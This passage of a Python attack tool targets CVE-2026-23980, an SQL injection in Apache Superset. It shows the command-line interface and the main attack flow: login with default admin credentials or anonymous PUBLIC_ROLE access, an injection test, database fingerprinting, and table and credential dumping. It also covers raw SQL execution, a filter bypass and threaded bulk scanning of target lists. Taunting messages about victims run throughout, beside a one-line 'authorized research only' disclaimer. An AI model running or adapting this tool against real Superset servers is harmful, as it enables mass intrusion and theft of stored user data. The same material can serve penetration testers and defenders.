        f"  \u2551  {C.BLINK}CVE-2026-23980{C.RESET}{accent}  --  Apache Superset SQLi            \u2551",
        f"  \u2551  {C.RESET}{C.DIM}CVSS 6.5  |  CWE-89  |  Superset < 6.0.0{C.RESET}{accent}         \u2551",
        f"  \u255a{rule}\u255d{C.RESET}",
    )
    print("\n".join(box_rows))

    tagline = (
        f"  {C.GRAY}// their queries bleed data. "
        f"sqlExpression was the wound.{C.RESET}"
    )
    _typewriter(tagline, speed=0.015)
    print()


# -- Main --------------------------------------------------------------------

def _build_arg_parser():
    """Build the argparse parser with all option groups of the CLI."""
    desc = f"""
  {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- Apache Superset Authenticated SQL Injection
  {C.DIM}sqlmap-style enumeration via sqlExpression / where injection{C.RESET}

  {C.GRAY}CVSS 6.5 | CWE-89 | Apache Superset < 6.0.0{C.RESET}

  {C.WHITE}{C.BOLD}KILL CHAIN:{C.RESET}
  {C.DIM}POST /api/v1/chart/data -> sqlExpression -> exec() on DB{C.RESET}
"""

    # argparse expands %(prog)s in the epilog, so it must stay literal here.
    epilog = f"""
  {C.WHITE}{C.BOLD}EXAMPLES:{C.RESET}

  {C.CYAN}Recon:{C.RESET}
    %(prog)s -u http://target:8088 --check

  {C.CYAN}Enumerate:{C.RESET}
    %(prog)s -u http://target:8088 --banner --current-user --current-db
    %(prog)s -u http://target:8088 --dbs
    %(prog)s -u http://target:8088 --tables
    %(prog)s -u http://target:8088 --tables -D public
    %(prog)s -u http://target:8088 --columns -T users
    %(prog)s -u http://target:8088 --count -T users

  {C.CYAN}Dump:{C.RESET}
    %(prog)s -u http://target:8088 --dump -T users
    %(prog)s -u http://target:8088 --dump -T users -C "username,password" --start 0 --stop 50
    %(prog)s -u http://target:8088 --dump-all --stop 5

  {C.CYAN}Raw SQL:{C.RESET}
    %(prog)s -u http://target:8088 --sql "SELECT version()"

  {C.CYAN}No creds:{C.RESET}
    %(prog)s -u http://target:8088 --anonymous --banner --tables
  {C.CYAN}Bypass + Bulk:{C.RESET}
    %(prog)s -u http://target:8088 --tables --xml-bypass
    %(prog)s --scan-file targets.txt --threads 20

  {C.DIM}// authorized security research only.{C.RESET}
"""

    parser = argparse.ArgumentParser(description=desc, epilog=epilog,
                                     formatter_class=argparse.RawDescriptionHelpFormatter)

    g = parser.add_argument_group(f"{C.RED}TARGET{C.RESET}",
                                  f"{C.DIM}who forgot to parameterize today?{C.RESET}")
    g.add_argument("-u", "--url", help="Superset URL (http://target:8088)")
    g.add_argument("--user", default="admin", help="username (default: admin)")
    g.add_argument("--password", default="admin", help="password (default: admin)")
    g.add_argument("--anonymous", action="store_true",
                   help="skip login -- exploit via PUBLIC_ROLE (no creds needed)")
    g.add_argument("--ds-id", type=int, help="datasource/dataset ID")

    g = parser.add_argument_group(f"{C.RED}ENUMERATE{C.RESET}",
                                  f"{C.DIM}sqlmap-style automated extraction{C.RESET}")
    g.add_argument("--banner", action="store_true", help="DB version banner")
    g.add_argument("--current-user", action="store_true", help="current DB user")
    g.add_argument("--current-db", action="store_true", help="current database")
    g.add_argument("--hostname", action="store_true", help="server hostname")
    g.add_argument("--dbs", action="store_true", help="list databases")
    g.add_argument("--tables", action="store_true", help="list tables")
    g.add_argument("--columns", action="store_true", help="list columns (requires -T)")
    g.add_argument("--dump", action="store_true", help="dump table (requires -T)")
    g.add_argument("--dump-all", action="store_true", help="dump all tables")
    g.add_argument("--count", action="store_true", help="count table rows (requires -T)")

    g = parser.add_argument_group(f"{C.RED}SPECIFY{C.RESET}",
                                  f"{C.DIM}narrow down the target{C.RESET}")
    g.add_argument("-D", dest="target_db", help="target database/schema")
    g.add_argument("-T", dest="target_table", help="target table")
    g.add_argument("-C", dest="target_columns", help="target columns (comma-sep)")
    g.add_argument("--start", type=int, default=0, help="start row (default: 0)")
    g.add_argument("--stop", type=int, default=20, help="stop row (default: 20)")

    g = parser.add_argument_group(f"{C.RED}INJECTION{C.RESET}",
                                  f"{C.DIM}manual control over the injection{C.RESET}")
    g.add_argument("--check", action="store_true", help="recon only")
    g.add_argument("--test", action="store_true", help="test if injectable")
    g.add_argument("--sql", help="raw SQL query to extract")
    g.add_argument("--injection-point", choices=["sqlExpression", "where"],
                   default="sqlExpression", help="injection vector (default: sqlExpression)")
    g.add_argument("--xml-bypass", action="store_true",
                   help="bypass subquery filter via query_to_xml()")

    g = parser.add_argument_group(f"{C.RED}SCAN{C.RESET}")
    g.add_argument("--scan-file", help="bulk scan targets (one URL/line)")
    g.add_argument("--threads", type=int, default=10, help="scan threads (default: 10)")
    g.add_argument("--scan-output", help="save scan results")

    g = parser.add_argument_group(f"{C.RED}GENERAL{C.RESET}")
    g.add_argument("-v", type=int, default=1, help="verbosity 0-3 (default: 1)")
    g.add_argument("--proxy", help="HTTP proxy (http://127.0.0.1:8080)")
    g.add_argument("--timeout", type=int, default=30, help="timeout (default: 30)")
    g.add_argument("--batch", action="store_true", help="non-interactive mode")

    return parser


def main():
    """Command-line entry point.

    Flow, in order:
        1. Parse arguments and set the module-level ``VERBOSITY``.
        2. With ``--scan-file``: run the bulk scan and exit 0.
        3. Otherwise require ``--url``; export ``--proxy`` through the
           ``HTTP_PROXY`` / ``HTTPS_PROXY`` environment variables.
        4. Version check, then anonymous and/or credential login.
        5. List datasources; ``--check`` stops here with exit 0.
        6. Pick the datasource (``--ds-id`` or the first one listed).
        7. Run the injection test when any action flag is set; ``--test``
           alone exits afterwards (0 on success, 1 on failure).
        8. Fingerprint the database when an enumeration flag is set, then
           run each requested action and finally the ``--sql`` query.

    Exits with status 1 on a missing URL, failed authentication, no usable
    datasource, a failed ``--test``, or a table-bound flag without ``-T``.
    """
    global VERBOSITY

    parser = _build_arg_parser()
    args = parser.parse_args()
    VERBOSITY = args.v

    # Bulk scan
    if args.scan_file:
        run_bulk_scan(args.scan_file, args.threads, args.timeout, args.scan_output)
        sys.exit(0)

    if not args.url:
        fail("--url / -u required (or --scan-file for bulk)")
        parser.print_usage()
        sys.exit(1)

    base_url = args.url.rstrip("/")
    if args.proxy:
        # Local import: os is only needed for this optional feature.
        import os
        os.environ["HTTP_PROXY"] = args.proxy
        os.environ["HTTPS_PROXY"] = args.proxy

    banner()

    # -- Recon ----------------------------------------------------------------
    info("probing target...")
    version = check_version(base_url, timeout=args.timeout)
    if version:
        if is_vulnerable(version):
            good(f"Superset {C.BOLD}{version}{C.RESET} -- {C.RED}{C.BOLD}VULNERABLE{C.RESET}")
        else:
            warn(f"Superset {version} -- likely patched")
    else:
        warn("version unknown")

    # -- Auth -----------------------------------------------------------------
    session = None

    if args.anonymous:
        info("trying anonymous access (PUBLIC_ROLE)...")
        session = try_anonymous(base_url, timeout=args.timeout)
        if session:
            good(f"anonymous access {C.BOLD}WORKS{C.RESET} -- PUBLIC_ROLE is active")
            creepy("no credentials needed. they left the door open.")
        else:
            fail("anonymous access denied -- PUBLIC_ROLE not configured")
            warn("falling back to credential-based login...")

    if not session:
        info(f"authenticating as '{args.user}'...")
        session = login(base_url, args.user, args.password, timeout=args.timeout)
        if not session:
            fail("all authentication methods failed")
            sys.exit(1)
        good("authenticated")

    # -- Datasources ----------------------------------------------------------
    info("enumerating datasources...")
    datasources = enumerate_datasources(base_url, session, timeout=args.timeout)
    if datasources:
        good(f"{len(datasources)} datasource(s):")
        for ds in datasources:
            print(f"    {C.CYAN}{ds['id']}{C.RESET}  {ds['name']}  "
                  f"{C.DIM}[{ds['database']}]{C.RESET}")
    else:
        warn("no datasources found")

    if args.check:
        print(f"\n  {C.GRAY}// recon complete.{C.RESET}\n")
        sys.exit(0)

    # -- Resolve datasource ---------------------------------------------------
    # Compare against None so an explicitly supplied ID of 0 is respected.
    if args.ds_id is None:
        if datasources:
            args.ds_id = datasources[0]["id"]
            info(f"using datasource: {C.BOLD}{args.ds_id}{C.RESET}")
        else:
            fail("no --ds-id and no datasources found")
            sys.exit(1)

    # -- Test injection -------------------------------------------------------
    # One list drives every "was an action requested?" decision below, so a
    # flag cannot be forgotten in one place (previously --hostname was).
    wants_enum = any([args.banner, args.current_user, args.current_db,
                      args.hostname, args.dbs, args.tables, args.columns,
                      args.dump, args.dump_all, args.count])
    wants_extract = wants_enum or bool(args.sql)

    if wants_extract or args.test:
        info(f"testing injection via {C.BOLD}{args.injection_point}{C.RESET}...")
        inj = test_injectable(base_url, session, args.ds_id, timeout=args.timeout)
        if inj:
            good(f"injectable via {C.BOLD}{inj}{C.RESET}")
            # Use the vector that was actually confirmed.
            args.injection_point = inj
        else:
            fail("injection test failed")
            if args.test:
                sys.exit(1)

    if args.test and not wants_extract:
        print(f"\n  {C.GRAY}// injectable. use --banner, --tables, --dump to extract.{C.RESET}\n")
        sys.exit(0)

    # -- Fingerprint DB -------------------------------------------------------
    # Needed by every enumeration action; only a pure --sql run can skip it.
    db_type = "unknown"
    if wants_enum:
        db_type = fingerprint_db(base_url, session, args.ds_id,
                                 args.injection_point, args.timeout)

    ip = args.injection_point
    xb = args.xml_bypass
    to = args.timeout

    # -- Enumeration ----------------------------------------------------------
    if args.banner:
        enum_banner(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.current_user:
        enum_current_user(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.current_db:
        enum_current_db(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.hostname:
        enum_hostname(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.dbs:
        enum_dbs(base_url, session, args.ds_id, db_type, ip, xb, to)

    if args.tables:
        enum_tables(base_url, session, args.ds_id, db_type, ip, xb, to,
                    target_db=args.target_db, datasources=datasources)

    if args.columns:
        if not args.target_table:
            fail("--columns requires -T <table>")
            sys.exit(1)
        enum_columns(base_url, session, args.ds_id, db_type, ip, xb, to,
                     args.target_table, target_db=args.target_db,
                     datasources=datasources)

    if args.count:
        if not args.target_table:
            fail("--count requires -T <table>")
            sys.exit(1)
        enum_count(base_url, session, args.ds_id, db_type, ip, xb, to,
                   args.target_table, target_db=args.target_db)

    if args.dump:
        if not args.target_table:
            fail("--dump requires -T <table>")
            sys.exit(1)
        enum_dump(base_url, session, args.ds_id, db_type, ip, xb, to,
                  args.target_table, target_columns=args.target_columns,
                  target_db=args.target_db,
                  start=args.start, stop=args.stop, datasources=datasources)

    if args.dump_all:
        enum_dump_all(base_url, session, args.ds_id, db_type, ip, xb, to,
                      target_db=args.target_db,
                      start=args.start, stop=args.stop, datasources=datasources)

    # -- Raw SQL --------------------------------------------------------------
    if args.sql:
        info(f"executing: {C.DIM}{args.sql}{C.RESET}")
        val = extract_value(base_url, session, args.ds_id, args.sql,
                            inj_point=ip, xml_bypass=xb, timeout=to)
        if val:
            good(f"result: {C.BOLD}{val}{C.RESET}")
        else:
            fail("no data extracted")

    print(f"\n  {C.GRAY}{C.DIM}// sqlExpression was never meant to be trusted.{C.RESET}\n")


# Run the CLI only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()